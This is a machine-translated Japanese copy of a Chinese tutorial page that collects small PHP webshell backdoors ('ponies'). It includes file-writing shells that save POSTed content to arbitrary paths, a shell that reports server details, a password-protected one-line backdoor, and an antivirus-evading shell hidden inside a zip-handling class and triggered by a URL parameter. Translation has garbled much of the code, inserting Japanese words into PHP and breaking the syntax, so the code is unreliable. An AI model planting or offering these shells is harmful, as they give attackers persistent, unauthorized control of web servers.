超小型PHPポニーまとめ（バックドアを探している友達に便利）_PHPチュートリアル

著者: スパイダー
私も超小型の PHP ポニーを飼っています

コードをコピー コードは次のとおりです:

header("content-Type: text/html; charset=gb2312 ") ;
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] =tripslashes($v);
?>

ファイル名を保存します:


<テキストエリア名="テキスト" COLS="70" ROWS="18" >

submit" name="submit" value="保存">

if(isset($_POST['file']))
{
$fp = @fopen($_POST[ 'ファイル '],'wb');
echo @fwrite($fp,$_POST['text']) '保存に失敗しました!'
@fclose($fp); ?> ;


昨夜、退屈していて php チュートリアルをいくつか見ましたが、php が本当に非常に強力であることがわかりました。ちなみに私は
php pony
を書きました
コードは以下に直接貼り付けています。 。

コードをコピーします
コードは次のとおりです:

php ponyBy:SinCoder< ;/ br> このプログラムのパス: ".__FILE__."サーバー オペレーティング システム: ".PHP_OS"サーバー IP アドレス: ".gethostbyname($_SERVER["SERVER_NAME"])."
PHP バージョン: ".PHP_VERSION; ?>

method="post">

保存パス:




if(!(isset($_POST["data"]) && isset($_POST["dir"]) ))
exit();
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0)
{
$p_File=fopen($_POST[" dir"] ,"a");
if(!$p_File)
echo "書き込みに失敗しました! 別のディレクトリを試してください!";
else
echo "OK!! ";
fputs($p_File,$_POST["data " ]);
fclose($p_File);
}
else
echo "データを完全に入力してください!";
?>


php Pony のバックドアを一文で説明



コードをコピー

コードは次のとおりです:


)?> このようなアクセスの後、jb51. php は現在のディレクトリに生成されます。内容は )?>、パスワードは jb51 です

最新のアンチキル php ポニー

をコピーしますコード コードは次のとおりです:

class zip
{
var $datasec, $ctrl_dir = array();
var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00";
var $old_offset = 0; var $dirs = Array(".");
関数 get_List($zip_name)
{
$ret = '';
$zip = @fopen($zip_name, 'rb');
if(!$zip) return(0);
$centd = $this->ReadCentralDir($zip,$zip_name);
@rewind($zip);
@fseek($zip, $centd['offset']);
for ($i=0; $i<$centd['entries']; $i++)
{
$header = $this->ReadCentralFileHeaders($zip);
$header['index'] = $i;$info['filename'] = $header['filename'];
$info['stored_filename'] = $header['stored_filename'];
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size'];
$info['crc'] = strtoupper(dechex( $header['crc'] ));
$info['mtime'] = $header['mtime']; $info['コメント'] = $header['コメント'];
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0;
$info['index'] = $header['index'];$info['status'] = $header['status'];
$ret[]=$info; unset($header);
}
$ret を返す;
}
関数 Add($files,$compact)
{
if(!is_array($files[0])) $files=Array($files);
for($i=0;$files[$i];$i++){
$fn = $files[$i];
if(!in_Array(dirname($fn[0]),$this->dirs))
$this->add_Dir(dirname($fn[0]));
if(basename($fn[0]))
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact);
}
$ret を返す;
}
function get_file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
$data を返します。 $ctrldir 。 $this -> eof_ctrl_dir 。
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).
pack('V', strlen($ctrldir)) 。 Pack('V', strlen($data)) 。 "x00x00";
}
関数 add_dir($name)
{
$name = str_replace("\", "/", $name);
$fr = "x50x4bx03x04x0ax00x00x00x00x00x00x00x00x00";
$fr .= Pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$fr .= Pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
$これ ->データセック[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "x50x4bx01x02x00x00x0ax00x00x00x00x00x00x00x00x00";
$cdrec .= Pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$cdrec .= Pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$ext = "xffxffxffxff";
$cdrec .= Pack("V", 16 ).pack("V", $this -> old_offset ).$name;
$これ -> ctrl_dir[] = $cdrec;
$これ -> old_offset = $new_offset;
$これ -> dirs[] = $name;
}
function add_File($data, $name, $compact = 1)
{
$name = str_replace('\', '/', $name);
$dtime = dechex($this->DosTime());
$hexdtime = 'x' 。 $dtime[6] 。 $dtime[7].'x'.$dtime[4] 。 $dtime[5]
。 'バツ' 。 $dtime[2] 。 $dtime[3].'x'.$dtime[0].$dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
if($compact)
$fr = "x50x4bx03x04x14x00x00x00x08x00".$hexdtime;
else $fr = "x50x4bx03x04x0ax00x00x00x00x00".$hexdtime;
$unc_len = strlen($data); $crc = crc32($data);
if($compact){
$zdata = gzcompress($data); $c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
}else{
$zdata = $data;
}
$c_len=strlen($zdata);
$fr .= Pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$fr .= Pack('v', strlen($name)).pack('v', 0).$name.$zdata;
$fr .= Pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$これ ->データセック[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
if($compact)
$cdrec = "x50x4bx01x02x00x00x14x00x00x00x08x00";
else $cdrec = "x50x4bx01x02x14x00x0ax00x00x00x00x00";
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
$cdrec .= Pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 );
$cdrec .= Pack('v', 0 ).pack('v', 0 ).pack('V', 32 );
$cdrec .= Pack('V', $this -> old_offset );
$これ -> old_offset = $new_offset;
$cdrec .= $name;
$これ -> ctrl_dir[] = $cdrec;
true を返します。
}
関数 DosTime() {
$timearray = getdate();
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980; $timearray['mon'] = 1;
$timearray['mday'] = 1; $timearray['時間'] = 0;
$timearray['分'] = 0; $timearray['秒'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['時間'] << 11) |
($timearray['分'] <<5) | ($timearray['秒'] >> 1);
}
//圧縮パッケージ全体を抽出します
//Extract を直接使用すると、パスの問題が発生します。この関数は、Extract を実行する前に、まずリストからファイル情報を取得し、すべてのディレクトリを作成します。
function ExtractAll ($zn, $to)
{
if (substr($to,-1)!="/") $to .= "/"
$files = $this->get_List($zn);
$cn = count($files); ;
if (is_array($files))
{
for($i=0;$i{
if($files[$i]['フォルダー']==1){
@mkdir ($to.$files[$i]['ファイル名'],$GLOBALS['cfg_dir_purview']);
@chmod($to.$files[$i]['ファイル名'],$GLOBALS[ 'cfg_dir_purview' ]);
}
}
}
$this->Extract ($zn,$to)
}
function Extract ( $zn, $to, $index = Array(-1) );
$ok = 0; $zip = @fopen($zn,'rb');
if(!$zip) return(-1);
$cdir = $this->ReadCentralDir($zip,$zn) ;
$ pos_entry = $cdir['offset'];
if(!is_array($index)){ $index = array($index) }
for($i=0; isset($index[$i]) );$ i++){
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
return(-1) ;
}
for ($i{
@fseek($zip, $pos_entry);
$header = $this->ReadCentralFileHeaders($) zip);
$header['index'] = $i; $pos_entry = ftell($zip); ("- 1",$index)||in_array($i,$index))
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
}
fclose($zip);
return $stat;
}
function ReadFileHeader($zip)
{
$binary_data = fread($zip, 30);
$data = unpack('vchk/vid/vversion/ vflag/vcompression /vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
$header['filename'] = fread($zip, $data['filename_len']); data[' extra_len'] != 0) {
$header['extra'] = fread($zip, $data['extra_len'])
} else { $header['extra'] = '';
$header ['compression'] = $data['compression']; $header['size'] = $data['size'];
$header['compressed_size'] = $data['compressed_size'];
$header ['crc'] = $data['crc']; $header['flag'] = $data['mdate'] = $data['mdate']; $header['mtime'] = $data['mtime'];
if ($header['mdate'] && $header['mtime']){
$hour=($header['mtime']&0xF800) >> ;11;$分=($header['mtime']&0x07E0)>>5;
$秒=($header['mtime']&0x001F)*2;$年=(($header[ 'mdate' ]&0xFE00)>>9)+1980;
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; ['mtime '] = mktime($hour, $ minutes, $secde, $month, $day, $year);
}else{$header['mtime'] = time();}
$header['stored_filename '] = $header['ファイル名'];
$header['ステータス'] = "ok";
return $headers($zip){
$binary_data = fread($zip, 46) ;
$ header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); if ($ header['filename_len'] != 0)
$header['filename'] = fread($zip,$header['filename_len']);
else $header['filename'] = ''; if ($ header['extra_len'] != 0)
$header['extra'] = fread($zip, $header['extra_len']);
else $header['extra'] = ''; if ($ header['comment_len'] != 0)
$header['comment'] = fread($zip, $header['comment_len']);
else $header['comment'] = ''; if ($ header['mdate'] && $header['mtime'])
{
$hour = ($header['mtime'] & 0xF800) >> 11; mtime'] & 0x07E0) >>
$秒 = ($header['mtime'] & 0x001F)*2;
$year = (($header['mdate'] >> 9) + 1980;
$month = ($header['mdate'] >>
$day = $header['mdate'] = mktime) ($時間、$分、$秒、$月、$日、$年);
$header['mtime'] = time();
$header['stored_filename'] = $header ['ファイル名 '];
$header['ステータス'] = 'ok';
if (substr($header['ファイル名'], -1) == '/')
$header['外部'] = 0x41FF0010;
$header を返す
}
関数 ReadCentralDir($zip,$zip_name)
if ($size @fseek($zip, $size-$maximum_size);
$pos = ftell($zip);
while ($pos $byte = @fread ($zip , 1); $bytes << 8) | Ord($byte); $pos++;
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18));
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
$centd['disk_entries'] = $data['disk_entries'];
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
$centd['サイズ'] = $data['サイズ']; $centd['ディスク'] = $data['ディスク'];
$centd を返す;
}
function ExtractFile($header,$to,$zip)
{
$header = $this->readfileheader($zip);
$header['external'] = (!isset($header['external']) ? 0 : $header['external']);
if(substr($to,-1)!="/") $to.="/";
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']);
if (!($header['external']==0x41FF0010)&&!($header['external']==16))
{
if ($header['compression']==0)
{
$fp = @fopen($to.$header['ファイル名'], 'wb');
if(!$fp) return(-1);
$size = $header['compressed_size'];
while ($size != 0)
{
$read_size = ($size < 2048 ? $size : 2048);
$buffer = fread($zip, $read_size);
$binary_data = Pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
fclose($fp);
touch($to.$header['filename'], $header['mtime']);
}else{
$fp = @fopen($to.$header['ファイル名'].'.gz','wb');
if(!$fp) return(-1);
$binary_data = Pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
Chr(0x00), time(), Chr(0x00), Chr(3));
fwrite($fp, $binary_data, 10);
$size = $header['compressed_size'];
while ($size != 0)
{
$read_size = ($size < 1024 ? $size : 1024);
$buffer = fread($zip, $read_size);
$binary_data = Pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
$binary_data = Pack('VV', $header['crc'], $header['size']);
fwrite($fp, $binary_data,8); fclose($fp);
$gzp = @gzopen($to.$header['filename'].'.gz','rb') または die("Cette archive est compress");
if(!$gzp) return(-2);
$fp = @fopen($to.$header['ファイル名'],'wb');
if(!$fp) return(-1);
$size = $header['size'];
while ($size != 0)
{
$read_size = ($size < 2048 ? $size : 2048);
$buffer = gzread($gzp, $read_size);
$binary_data = Pack('a'.$read_size, $buffer);
@fwrite($fp, $binary_data, $read_size);
$size -= $read_size;
}
fclose($fp); gzclose($gzp);
touch($to.$header['filename'], $header['mtime']);
@unlink($to.$header['ファイル名'].'.gz');
}}
true を返します。
}
}
if($_GET['zxzgcn']=='login'){
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] =tripslashes($v);
?>
<フォームメソッド="POST">
保存先:









if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
エコー @fwrite($fp,$_POST['text']) ? 「成功しました！」 : 「落ちた!」;
@fclose($fp);
}
}
?>

用法xxx.php?zxzgcn=login

http://www.bkjia.com/PHPjc/325284.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/325284.html技術記事作者: スパイダー 我也来个超小PHP小马 复制代码 代码如下: ?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=$v) $_P...